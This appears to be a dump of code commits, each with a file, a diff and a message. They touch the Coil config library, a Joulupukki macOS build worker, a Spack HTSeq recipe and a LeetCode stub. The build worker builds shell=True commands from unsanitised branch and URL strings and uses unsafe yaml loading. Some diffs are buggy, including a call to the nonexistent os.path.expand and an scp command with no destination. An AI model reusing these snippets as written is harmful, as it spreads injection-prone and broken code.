# Copyright (c) 2008-2009 ITA Software, Inc.
# See LICENSE.txt for details.
"""Coil: A Configuration Library."""
__version_info__ = (0,3,14)
__version__ = ".".join([str(x) for x in __version_info__])
__all__ = ['struct', 'parser', 'tokenizer', 'errors']
from coil.parser import Parser
def parse_file(file_name, **kwargs):
"""Open and parse a coil file.
See :class:`Parser <coil.parser.Parser>` for possible keyword arguments.
:param file_name: Name of file to parse.
:type file_name: str
:return: The root object.
:rtype: :class:`Struct <coil.struct.Struct>`
"""
coil = open(file_name)
return Parser(coil, file_name, **kwargs).root()
def parse(string, **kwargs):
"""Parse a coil string.
See :class:`Parser <coil.parser.Parser>` for possible keyword arguments.
:param file_name: String containing data to parse.
:type file_name: str
:return: The root object.
:rtype: :class:`Struct <coil.struct.Struct>`
"""
return Parser(string.splitlines(), **kwargs).root()
|
Python
| 0 |
@@ -187,9 +187,9 @@
,3,1
-4
+5
)%0A__
|
96446f8b132d12db6f701b3d9e54e7e8ddc73dd6
|
Add transfert package step
|
joulupukki/worker/lib/osxpacker.py
|
joulupukki/worker/lib/osxpacker.py
|
import os
import subprocess
import pecan
import yaml
from joulupukki.worker.lib.packer import Packer
from joulupukki.common.logger import get_logger, get_logger_job
from joulupukki.common.datamodel.job import Job
class OsxPacker(object):
def __init__(self, builder, config):
self.config = config
self.builder = builder
self.distro = "osx"
self.source_url = builder.source_url
self.source_type = builder.source_type
self.branch = builder.build.branch
self.folder = builder.folder
job_data = {
'distro': self.distro,
'username': self.builder.build.username,
'project_name': self.builder.build.project_name,
'build_id': self.builder.build.id_,
}
self.job = Job(job_data)
self.job.create()
self.folder_output = self.job.get_folder_output()
self.job_tmp_folder = self.job.get_folder_tmp()
if not os.path.exists(self.folder_output):
os.makedirs(self.folder_output)
if not os.path.exists(self.job_tmp_folder):
os.makedirs(self.job_tmp_folder)
self.logger = get_logger_job(self.job)
def set_status(self, status):
self.job.set_status(status)
def set_build_time(self, build_time):
self.job.set_build_time(build_time)
def run(self):
steps = (
('cloning', self.clone),
('reading_conf', self.reading_conf),
('setup', self.setup),
('compiling', self.compile_),
)
for step_name, step_function in steps:
self.set_status(step_name)
if step_function() is not True:
self.logger.debug("Task failed during step: %s", step_name)
self.set_status('failed')
return False
# Save package name in build.cfg
if (self.config.get('name') is not None and
self.builder.build.package_name is None):
self.builder.build.package_name = self.config.get('name')
self.builder.build._save()
self.set_status('succeeded')
return True
def clone(self):
self.logger.info("Cloning main repo")
self.logger.info(self.job.get_folder_tmp())
cmds = [
"cd %s" % self.job.get_folder_tmp(),
"git clone -b %s %s source/" % (self.branch, self.source_url),
]
command = " && "
command = command.join(cmds)
return self.exec_cmd(command)
def reading_conf(self):
self.logger.info("Reading conf from main repo")
conf_file = "%s/source/.packer.yml" % self.job.get_folder_tmp()
try:
stream = open(conf_file, "r")
except IOError:
self.logger.error(".packer.yml not present")
return False
docs = yaml.load_all(stream)
osx_conf = {}
for doc in docs:
for key, value in doc.items():
osx_conf[key] = value
try:
self.dependencies = osx_conf['osx']['brew_deps']
self.commands = osx_conf['osx']['commands']
except KeyError:
self.logger.error("Malformed .packer.yml file")
return False
return True
def setup(self):
# Installing dependencies
for depen in self.dependencies:
cmd_list = ["brew", "install"]
cmd_list.extend(depen.split(" "))
self.logger.info("Installing dependency: %s" % depen)
process = subprocess.Popen(
cmd_list,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
stdout, stderr = process.communicate()
self.logger.debug(stdout)
self.logger.info(stderr)
if process.returncode:
self.logger.error("Error in setup: %d" % process.returncode)
return False
return True
def compile_(self):
self.logger.info("Start compiling")
# Compiling ring-daemon
cd_command = ["cd %s" % self.job.get_folder_tmp()]
self.commands = cd_command + self.commands
long_command = " && "
long_command = long_command.join(self.commands)
long_command = long_command % {
"prefix_path": pecan.conf.workspace_path
}
self.logger.info("Compiling")
process = subprocess.Popen(
long_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
stdout, stderr = process.communicate()
self.logger.debug(stdout)
self.logger.info(stderr)
if process.returncode:
self.logger.error("Error in setup: %d" % process.returncode)
return False
return True
def exec_cmd(self, cmds):
process = subprocess.Popen(
cmds,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
stdout, stderr = process.communicate()
self.logger.debug(stdout)
self.logger.info(stderr)
if process.returncode:
self.logger.error("Error in setup: %d" % process.returncode)
return False
return True
|
Python
| 0 |
@@ -1546,16 +1546,69 @@
pile_),%0A
+ ('transfering', self.transfert_package),%0A
@@ -4899,32 +4899,427 @@
return True%0A%0A
+ def transfert_package(self):%0A self.logger.info(%22Start package transfert%22)%0A host = pecan.conf.self_host%0A user = pecan.conf.self_user%0A key = pecan.conf.self_key%0A transfert_command = %22scp -i %25s %25s@%25s:%25s%22 %25 (%0A key,%0A user,%0A host,%0A self.job.get_folder_path()%0A )%0A return self.exec_cmd(transfert_command)%0A%0A
def exec_cmd
|
3498ddd7817e72b3f6f0b851fa94e82047cb9129
|
Create the config file if doesn't exist
|
chubby/config.py
|
chubby/config.py
|
Python
| 0.000002 |
@@ -0,0 +1,319 @@
+import os%0A%0Adef create_if_not_exists():%0A %22%22%22%0A Create the config file if doesn't exist already.%0A %22%22%22%0A%0A # check if it exists%0A if not os.path.exists(os.path.join(os.path.expand(%22~%22), '.chubby')):%0A os.chdir(os.path.expand(%22~%22))%0A # create file%0A with open(%22.chubby%22, 'a'):%0A pass%0A
|
|
96476a32e545184908f64aac41b23987255138e2
|
Create new package. (#6623)
|
var/spack/repos/builtin/packages/py-htseq/package.py
|
var/spack/repos/builtin/packages/py-htseq/package.py
|
Python
| 0 |
@@ -0,0 +1,1930 @@
+##############################################################################%0A# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.%0A# Produced at the Lawrence Livermore National Laboratory.%0A#%0A# This file is part of Spack.%0A# Created by Todd Gamblin, [email protected], All rights reserved.%0A# LLNL-CODE-647188%0A#%0A# For details, see https://github.com/spack/spack%0A# Please also see the NOTICE and LICENSE files for our notice and the LGPL.%0A#%0A# This program is free software; you can redistribute it and/or modify%0A# it under the terms of the GNU Lesser General Public License (as%0A# published by the Free Software Foundation) version 2.1, February 1999.%0A#%0A# This program is distributed in the hope that it will be useful, but%0A# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and%0A# conditions of the GNU Lesser General Public License for more details.%0A#%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this program; if not, write to the Free Software%0A# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA%0A##############################################################################%0Afrom spack import *%0A%0A%0Aclass PyHtseq(PythonPackage):%0A %22%22%22HTSeq is a Python package that provides infrastructure to process%0A data from high-throughput sequencing assays.%22%22%22%0A%0A homepage = %22http://htseq.readthedocs.io/en/release_0.9.1/overview.html%22%0A url = %22https://github.com/simon-anders/htseq/archive/release_0.9.1.tar.gz%22%0A%0A version('0.9.1', '269e7de5d39fc31f609cccd4a4740e61')%0A%0A depends_on('py-setuptools', type='build')%0A depends_on('py-numpy', type=('build', 'run'))%0A depends_on('py-pysam', type=('build', 'run'))%0A depends_on('py-matplotlib', type=('build', 'run'))%0A depends_on('py-cython', type=('build', 'run'))%0A depends_on('swig', type=('build', 'run'))%0A
|
|
5503e1f54298a5b6121e35794d43c6642b3af6e0
|
Add lc0340_longest_substring_with_at_most_k_distinct_characters.py
|
lc0340_longest_substring_with_at_most_k_distinct_characters.py
|
lc0340_longest_substring_with_at_most_k_distinct_characters.py
|
Python
| 0.998744 |
@@ -0,0 +1,703 @@
+%22%22%22Leetcode 340. Longest Substring with At Most K Distinct Characters%0AHard%0A%0AURL: https://leetcode.com/problems/longest-substring-with-at-most-k-distinct-characters/%0A%0AGiven a string, find the length of the longest substring T that contains at most k%0Adistinct characters.%0A%0AExample 1:%0AInput: s = %22eceba%22, k = 2%0AOutput: 3%0AExplanation: T is %22ece%22 which its length is 3.%0A%0AExample 2:%0AInput: s = %22aa%22, k = 1%0AOutput: 2%0AExplanation: T is %22aa%22 which its length is 2.%0A%22%22%22%0A%0A%0Aclass Solution(object):%0A def lengthOfLongestSubstringKDistinct(self, s, k):%0A %22%22%22%0A :type s: str%0A :type k: int%0A :rtype: int%0A %22%22%22%0A pass%0A%0A%0Adef main():%0A pass%0A%0A%0Aif __name__ == '__main__':%0A main()%0A
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.